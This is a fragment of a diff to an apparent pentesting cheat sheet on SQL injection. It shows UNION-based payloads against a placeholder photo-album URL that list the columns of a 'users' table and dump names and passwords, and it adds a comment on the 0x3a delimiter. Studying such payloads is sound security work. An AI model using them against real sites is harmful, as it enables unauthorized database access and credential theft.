xapax/security/sql-injections.md

 http://example.com/photoalbum.php?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users'

 # Get content from the users-table.
-From columns name and password
+From columns name and password.
+The 0x3a only servers to create a delimitor between name and password

 http://example.com/photoalbum.php?id=1 union select 1,2,3,4,concat(name,0x3a,
 password),6,7,8,9 FROM users